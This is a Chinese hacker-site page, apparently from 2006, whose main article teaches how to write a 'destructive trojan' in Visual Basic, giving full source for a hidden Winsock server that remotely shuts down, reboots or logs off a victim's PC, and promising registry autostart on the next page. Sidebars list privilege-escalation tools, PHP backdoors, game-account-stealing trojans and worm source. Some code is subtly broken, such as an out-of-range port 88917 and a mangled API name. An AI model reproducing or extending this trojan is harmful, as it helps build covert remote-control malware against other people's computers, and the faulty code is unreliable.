·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]利用Visual Basic编写破坏性木马

热荐 ★★★★★

利用Visual Basic编写破坏性木马

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-12-20 10:09:54

首先，新建一工程，名为Server，新建一个窗体，Name为Server，在窗体中加入一个winsock控件，Name设为sckServer，协议设为默认的TCP／IP协议。

接下来我们回来Server窗体模块中，添加如下代码：

Private Sub form_Load() 
　 With Me 
　　 .sckServer.LocalPort = 88917'本地端口（呵呵！我的生日！） 
　　 .sckServer.Listen '开始监听 
　 End With 
End Sub 

'接受客户端的连接请求。 

Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) 
　 With Me 
　　 If .sckServer.State <>sckClosed Then .sckServer.Close 
　　 .sckServer.Accept (requestID) 
　 End With 
End Sub

下面我们来建立客户端程序：新建一个工程，名为Client，把窗体名为Client，在上面加入一个winsock控件，名为sckClient，协议为TCP／IP协议。再加一个按钮cmdConnect在窗体模块中加入代码：

Private Sub form_Load() 
　 With Me 
　　 .sckClient.RemoteHost = "127.0.0.1"'设置远程IP，本例设为本机。 
　　 .sckClient.RemotePort = 88917 '远程端口,就为server中的设置一样. 
　 End With 
End Sub 

Private sub cmdConnect_Click() 
　 SckClient.Connect 
End sub

至此，单击Connect按钮我们的两个工程已经可以进行通信了，但看不见，你可以在Client中的sckClient_Connect事件中加入代码：debug.print “Connetion successful!”来查看。

这仅是第一步，一点工作也做不了，下面我们来为它们添加功能。为了简单，本文章只实现一点小小的功能——关机，重启，注销。好，开始吧！

在Server工程中新建一个模块，Name为modApi，这个模快为一些API函数，添加如下API函数：

Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As
 Long, ByVal dwReserved As Long) As Long 

Public Const EWX_LOGOFF = 0 
Public Const EWX_REBOOT = 2 
Public Const EWX_SHUTDOWN = 1 
Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As 
Long 

Public Type RECT 
　 Left As Long 
　 Top As Long 
　 Right As Long 
　 Bottom As Long 
End Type

注：在两个socket中编程中，进行通信的重要事件是DataArrival事件，用于接收远程数据。

下面在Client工程的Client窗体中放入三个按钮，分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机，注销，重启操作。分别添加如下代码：

Private Sub cmdExit_Click() 
　 Me.sckClient.SendData "Exit" 
End Sub 

Private Sub cmdLogoff_Click() 
　 Me.sckClient.SendData "Logoff" 
End Sub 

Private Sub cmdReboot_Click() 
　 Me.sckClient.SendData "Reboot" 
End Sub

全都是对服务端发出请求。下面转到Server工程中：在Server中添加sckServer的DataArrial事件，接收客户端的请求。

Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) 
　 Dim strData As String 
　 With Me 
　　 ' 接收客户请求的信息 
　　 .sckServer.GetData strData 
　　 Select Case strData 
　　　 Case "Exit" 
　　　　 '关机 
　　　　 Call ExitWindowXXX(EWX_SHUTDOWN, 0) 
　　　 Case "Reboot" 
　　　　 '重启 
　　　　 Call ExitWindowXXX(EWX_REBOOT, 0) 
　　　 Case "Logoff" 
　　　　 '注销 
　　　 Call ExitWindowXXX(EWX_LOGOFF, 0) 
　　 End Select 
　 End With 

End Sub

好了,到此我们已经实现功能了，但还不行，我们要它在背后运行。这简单，在Server中的form_Load事件中加入一句：me.hide。好这下看不见了，但大家知道木马是一开机就自动运行了，这又是为什么，怎么实现的？把它加入到注册表的启动组中？对，不错，跟我来吧！

[1] [2] 下一页

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：突破IceSword自身的进程保护

下一篇文章：下载者U盘传染源码

【字体：小大】

中介交易区

网游盗号木马实现手记	01-09
黑色技术蠕虫下载者[完整源码]	11-01
利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02